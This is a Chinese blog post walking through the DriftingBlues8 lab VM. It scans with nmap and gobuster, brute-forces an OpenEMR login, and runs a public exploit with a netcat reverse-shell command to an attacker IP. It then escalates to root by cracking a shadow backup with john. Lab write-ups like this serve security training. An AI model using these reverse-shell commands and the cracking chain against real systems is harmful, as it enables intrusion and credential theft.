【靶场系列】driftingblues8

最新推荐文章于 2024-07-12 15:53:09 发布
最新推荐文章于 2024-07-12 15:53:09 发布
阅读量274 收藏 1
点赞数 2
分类专栏: 靶场系列 文章标签: 安全 web安全 网络安全 安全威胁分析 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41169485/article/details/137965970
版权

信息收集

nmap主机发现

nmap -sV -A -p- 192.168.56.0/24

Nmap scan report for 192.168.56.134
Host is up (0.021s latency).
Not shown: 65534 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
| http-title: OpenEMR Login
|_Requested resource was interface/login/login.php?site=default
|_http-server-header: Apache/2.4.38 (Debian)

爆破目录,基本上的都是目录遍历,不过都没什么用就是了
看到登录页面是openemr,随在kali中查找该cms的漏洞

┌──(kali㉿kali)-[~/Desktop]
└─$ searchsploit openemr                                               
------------------------------------------------ ---------------------------------
 Exploit Title                                  |  Path
------------------------------------------------ ---------------------------------
OpenEMR - 'site' Cross-Site Scripting           | php/webapps/38328.txt
OpenEMR - Arbitrary '.PHP' File Upload (Metaspl | php/remote/24529.rb
OpenEMR 2.8.1 - 'fileroot' Remote File Inclusio | php/webapps/1886.txt
OpenEMR 2.8.1 - 'srcdir' Multiple Remote File I | php/webapps/2727.txt
OpenEMR 2.8.2 - 'Import_XML.php' Remote File In | php/webapps/29556.txt
OpenEMR 2.8.2 - 'Login_Frame.php' Cross-Site Sc | php/webapps/29557.txt
OpenEMR 3.2.0 - SQL Injection / Cross-Site Scri | php/webapps/15836.txt
OpenEMR 4 - Multiple Vulnerabilities            | php/webapps/18274.txt
OpenEMR 4.0 - Multiple Cross-Site Scripting Vul | php/webapps/36034.txt
OpenEMR 4.0.0 - Multiple Vulnerabilities        | php/webapps/17118.txt
OpenEMR 4.1 - '/contrib/acog/print_form.php?for | php/webapps/36650.txt
OpenEMR 4.1 - '/Interface/fax/fax_dispatch.php? | php/webapps/36651.txt
OpenEMR 4.1 - '/Interface/patient_file/encounte | php/webapps/36648.txt
OpenEMR 4.1 - '/Interface/patient_file/encounte | php/webapps/36649.txt
OpenEMR 4.1 - 'note' HTML Injection             | php/webapps/38654.txt
OpenEMR 4.1.0 - 'u' SQL Injection               | php/webapps/49742.py
OpenEMR 4.1.1 - 'ofc_upload_image.php' Arbitrar | php/webapps/24492.php
OpenEMR 4.1.1 Patch 14 - Multiple Vulnerabiliti | php/webapps/28329.txt
OpenEMR 4.1.1 Patch 14 - SQL Injection / Privil | php/remote/28408.rb
OpenEMR 4.1.2(7) - Multiple SQL Injections      | php/webapps/35518.txt
OpenEMR 5.0.0 - OS Command Injection / Cross-Si | php/webapps/43232.txt
OpenEMR 5.0.0 - Remote Code Execution (Authenti | php/webapps/49983.py
OpenEMR 5.0.1 - 'controller' Remote Code Execut | php/webapps/48623.txt
OpenEMR 5.0.1 - Remote Code Execution (1)       | php/webapps/48515.py
OpenEMR 5.0.1 - Remote Code Execution (Authenti | php/webapps/49486.rb
OpenEMR 5.0.1.3 - 'manage_site_files' Remote Co | php/webapps/49998.py
OpenEMR 5.0.1.3 - 'manage_site_files' Remote Co | php/webapps/50122.rb
OpenEMR 5.0.1.3 - (Authenticated) Arbitrary Fil | linux/webapps/45202.txt
OpenEMR 5.0.1.3 - Authentication Bypass         | php/webapps/50017.py
OpenEMR 5.0.1.3 - Remote Code Execution (Authen | php/webapps/45161.py
OpenEMR 5.0.1.7 - 'fileName' Path Traversal (Au | php/webapps/50037.py
OpenEMR 5.0.1.7 - 'fileName' Path Traversal (Au | php/webapps/50087.rb
OpenEMR 5.0.2.1 - Remote Code Execution         | php/webapps/49784.py
OpenEMR 6.0.0 - 'noteid' Insecure Direct Object | php/webapps/50260.txt
OpenEMR Electronic Medical Record Software 3.2  | php/webapps/14011.txt
OpenEMR v7.0.1 - Authentication credentials bru | php/webapps/51413.py
Openemr-4.1.0 - SQL Injection                   | php/webapps/17998.txt

需要找到该cms的版本才能利用相应的漏洞
在一个pdf文件中看到版本为4.1.1

http://192.168.56.134/Documentation/Clinical_Decision_Rules_Manual.pdf

尝试4.1.1版本的漏洞,利用不成功

翻阅目录发现了两个sql文件,
image.png
写有用户secure的账号和密码,但是只能本地登录

用gobuster扫目录,加上txt参数

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.56.134/ -x txt

扫到wordlist.txt文件,是个字典
image.png

获取shell

尝试使用该字典爆破账号密码
image.png

登录账号,可以看到版本号
image.png

使用对应的exp,利用漏洞

python2 45161.py 'http://192.168.56.134' -u 'admin' -p '.:.yarrak.:.31' -c 'nc -e /bin/sh 192.168.56.129 5555'

nc反弹shell成功
image.png
进入交互式shell

python3 -c 'import pty;pty.spawn("/bin/bash")'

权限提升

本机开启web服务,让靶机下载linpeas.sh脚本并赋予执行权限

wget 192.168.56.129/1.sh
chmod +x 1.sh

运行脚本发现有shadow备份文件
image.png
复制下来用john爆破,得到clapton用户的密码,但是root的密码爆不出来

┌──(kali㉿kali)-[~/Desktop]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt shadow.bak 
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
dragonsblood     (clapton)     
1g 0:00:24:17 47.31% (ETA: 21:52:28) 0.000685g/s 4724p/s 4876c/s 4876C/s joseppy..josephine715
Use the "--show" option to display all of the cracked passwords reliably
Session aborted

登录clapton账号看到根目录下有多个文件,还有wordlist.txt字典,可能是想让我们用这个字典爆破
使用python开启http服务器下载该字典

python3 -m http.server

访问http://192.168.56.134:8000下载 wordlist.txt字典
保存字典,使用john爆破出root密码

┌──(kali㉿kali)-[~/Desktop]
└─$ sudo john --wordlist=/home/kali/Downloads/wordlist.txt shadow.bak 
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
.:.yarak.:.      (root)     
1g 0:00:00:08 DONE (2024-04-17 21:50) 0.1127g/s 6638p/s 6638c/s 6638C/s kruimel..bluelady
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

登录root用户
image.png

中原第一高手
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
vulntarget靶场系列.zip
01-16
靶场,是指为信息安全人员提供实战演练、渗透测试和攻防对抗等训练环境的虚拟或实体场地。在不同的领域中,靶场扮演着重要的角色,尤其是在网络安全领域,靶场成为培养和提高安全专业人员技能的重要平台。 首先,...
靶场系列之DC-1.md
07-26
靶场系列之DC-1.md
healthcare靶机(openEMR管理系统SQL注入漏洞)
m0_66299232的博客
11-25 558
6.在files,有一个配置文件可以更改,那么就可以把php-reverse-shell.php(github里有)的代码复制过来。pty.spawn('/bin/bash')" //反弹交互式shell。find / -perm -u=s -type f 2>/dev/null //查询以suid权限执行的文件。2.查看49742.py是一个python脚本,可以利用,只需更改ip 用python3来执行。nmap -p- -A -T4 192.168.1.102 //探测目标靶机开放端口和服务。
openemrV4.1.0本地靶机获取其webshell
BING
06-07 536
提示:一次简单的渗透测试笔记 渗透目录一、渗透步骤1.首先得到ip过后用nmap扫描开放哪些端口2.根据这个IP地址扫描该地址下开放了哪些目录,用dirsearch工具。3.根据扫描的目录进行访问就会发现openemr下面存在一个登录界面4.然后我用bp抓包发现一个请求地址5.我用sqlmap进行sql注入拿到用户名以及密码6.利用用户户名以及密码登录7.通过寻找找到有个文件以及php代码上传点,于是我上传了一句话木马![在这里插入图片描述](https://img-blog.csdnimg.cn/202
Vulnhub —— DriftingBlues系列
7ruth0hn的博客
11-27 564
文章目录写在前面思路DriftingBlues: 11.nmap扫描Tip:若靶机无法获取IP:2.漏洞探测与利用3.提权DriftingBlues: 2结语参考资料 写在前面 取证学习告一段落了,虽然个人赛失手了,但团体赛一等奖还是可以接受的。开始拖了很久的渗透学习 渗透工具: Nmap v7.91、gobuster、DIRB v2.22、crunch version 3.6、Hydra v9.1、pspy - version: v1.2.0 思路 DriftingBlues: 1 在官网下载ova文件
Healthcare靶机总结
qq_45301512的博客
01-12 432
靶机下载地址:打开靶机,使用nmap扫描出靶机的ip和所有开放的端口可以看到,靶机开放了21端口和80端口21端口为ftp的端口,一般遇到这种,就可以考虑ftp的匿名登录,我们可以试一下用户名anonymous,没有密码,这里登录失败那么只能根据80端口,打开网站,然后去网站入手打开网站先试试功能点,看能否找到可利用的漏洞,这里没发现漏洞点然后可以在源代码里面找找看有没有提示,这里也没有。
靶机渗透练习01-driftingblues1
Force~
03-24 1729
靶机地址: https://www.vulnhub.com/entry/driftingblues-1,625/ ###1、主机探活 arp-scan -I eth0 -l (指定网卡扫) masscan 192.168.184.0/24 -p 80,22 netdiscover -i eth0 -r 192.168.184.0/24 ###2、端口扫描 nmap -A -sV -T4 -p- 192.168.111.8 ###3、访问80端口,遇事不决,目录扫描来一波 gobuster .
靶场系列driftingblues2
qq_41169485的博客
04-19 433
登录后台,发现hello.php是可以编辑的,遂写入一句话木马。发现普通用户freddie用户开启了ssh登录,且私钥是可读的。nc反弹shell,注意payload需要url编码。下载linpeas.sh脚本,赋予执行权限并执行。访问hello.php,成功执行phpinfo。在kali上写入私钥文件,并设置为权限为600。使用wpscan扫描器扫描,先爆出用户。将压缩包保存到web服务器下,靶机下载。将域名写入hosts即可正常访问。访问80端口,发现使用域名。执行exp获取root权限。
靶场系列driftingblues
qq_41169485的博客
04-19 311
爆破域名,所以就跳过这一步直接得到test.driftingblues.box了。该脚本会用root权限执行/tmp/emergency程序,但该系统里并没有该程序。编辑/tmp/emergency实现更改root密码,并赋予执行权限。将test.driftingblues.box写入hosts文件。查看首页源代码,在最下方发现一段base64编码。尝试爆破在主页发现的一个用户eric,成功。等待定时任务执行,可以看到任务执行成功了。猜测需要域名访问,首先要知道靶机的域名。
二号靶场.zip
01-14
靶场,是指为信息安全人员提供实战演练、渗透测试和攻防对抗等训练环境的虚拟或实体场地。在不同的领域中,靶场扮演着重要的角色,尤其是在网络安全领域,靶场成为培养和提高安全专业人员技能的重要平台。 首先,...
vuInhub靶场实战系列-DC-8实战
05-31
vuInhub靶场实战系列-DC-8实战
webgoat靶场需要自行搭建
01-19
8. **学习资源**:OWASP提供详细的文档和教程来帮助用户了解如何使用WebGoat。同时,社区论坛和在线资源也提供了大量关于解决WebGoat练习的指导和讨论。 9. **持续更新**:WebGoat经常更新,以反映最新的安全威胁和...
移动互联安全扩展要求测评项
hakksjss的博客
07-10 1051
应为无线接入设备的安装选择合理位置,避免过度覆盖和电磁干扰。无线接入设备的安装位置选择不当,易被攻击者利用,特别是攻击者会通过无线信号过度覆盖的弱点进行无线渗透攻击,因此要选择合理的位置安装无线接入设备。
警钟!电池储能安全事故频发!物联网技术如何加强储能安全排查?
olzorange的博客
07-08 431
物联网技术的应用为储能安全排查提供了从源头预防到快速响应的全链条解决方案。
车载视频监控管理方案:无人驾驶出租车安全出行的保障
最新发布
TSINGSEE青犀视频官方技术博客
07-12 351
为了确保数据的安全性和可靠性,本方案采用云存储技术,将车辆视频数据和相关信息存储在云端。
网络设备安全
weixin_48579910的博客
07-11 837
交换机作为网络核心设备,其安全性直接影响到整个网络的稳定和安全。通过实施身份验证和访问控制、设备配置安全、VLAN安全、ARP欺骗防护、MAC地址安全、DHCP欺骗防护、STP安全、拒绝服务防护以及固件和软件更新等措施,可以有效防范各种安全威胁。结合使用适当的安全工具和技术,组织可以大幅提高其交换机的安全防护能力,保护网络基础设施和数据的安全。定期进行安全审计和更新,确保交换机和网络始终处于最佳安全状态。确保路由器的安全是保护整个网络基础设施和数据传输安全的关键。
[终端安全]-5 移动终端之操作系统安全
wendywm0496的博客
07-08 1017
每个应用程序运行在一个独立的进程中,通过操作系统的内存管理单元(MMU)实现自己独立的虚拟地址空间,通常从0开始到某个最大值(例如,32位系统上为4GB),这个空间是进程私有的,MMU负责将虚拟地址转换为物理地址。当操作系统在不同进程之间切换时,会切换当前的页表,通过改变MMU中存储的页表基地址(通常存储在寄存器中)来实现,这样进程A和进程B即使使用相同的虚拟地址,也会映射到不同的物理地址。当用户启动应用A时,操作系统会为其创建一个新的进程,该进程由应用A的UID 10001运行;
vulfocus靶场
07-28
vulfocus靶场是一个漏洞集成平台,可以通过在服务器中安装docker来使用。你可以使用以下命令将vulfocus镜像拉取到本地:docker pull vulfocus/vulfocus:latest。搭建vulfocus靶场可以按需搭建在本地或自己的服务器上,它提供了场景编排功能,可以用于内网突破训练和多重内网的穿透等用途。如果你想在本地搭建vulfocus靶场,可以按照以下步骤进行操作: 1. 创建一个目录并进入该目录,例如:mkdir VF靶场 && cd VF靶场。 2. 使用git命令克隆vulfocus仓库:git clone https://github.com/fofapro/vulfocus.git web。 3. 配置环境参数,将你的CentOS服务器的IP地址填入配置文件中。你可以使用ifconfig命令查看你的IP地址。 这样,你就可以搭建vulfocus靶场并开始使用了。 #### 引用[.reference_title] - *1* *2* [【靶场】vulfocus搭建和场景编排](https://blog.csdn.net/qq_39583774/article/details/130917089)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [vulfocus靶场的搭建](https://blog.csdn.net/qq_68890680/article/details/131351918)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值